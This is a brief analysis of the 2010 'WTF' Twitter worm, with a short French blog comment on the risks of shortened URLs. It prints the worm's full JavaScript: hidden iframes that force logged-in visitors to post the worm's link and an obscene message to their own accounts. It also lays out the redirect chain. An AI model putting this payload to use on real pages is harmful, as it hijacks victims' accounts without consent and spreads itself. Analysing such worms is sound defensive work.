/* Quick analysis of the WTF Twitter worm
Analysis by Chae Jong Bin (http://twitter.com/2gg) */
// WTF Twitter worm's tweet
WTF: hxxp://t.co/5Hfpkqu
// Source code of 1b7xk3b.html
< script>
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "hxxp://twitter.com/share/update?status=WTF:%20" + window.location;
el2.src = "hxxp://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);
< /script>
// Control flow (After you click link)
1) Navigate to hxxp://t.co/5Hfpkqu
2) Redirected to hxxp://pastehtml.com/view/1b7xk3b.html
3) Execute JavaScript (Twitter status update)
Analyse rapide du ver Twitter WTF
jeudi 30 septembre 2010. Lien permanent hacking / piratage
Une démonstration du risque engendré par les URL raccourcies, mise en pratique par le ver Twitter WTF qui inscrivait sur votre compte Twitter "i love anal sex with goats" .
Toute personne cliquant sur le lien se trouvait redirigée sur une page en html contenant un code malicieux qui mettait à jour le status des victimes connectées à leur compte Twitter.
Derniers commentaires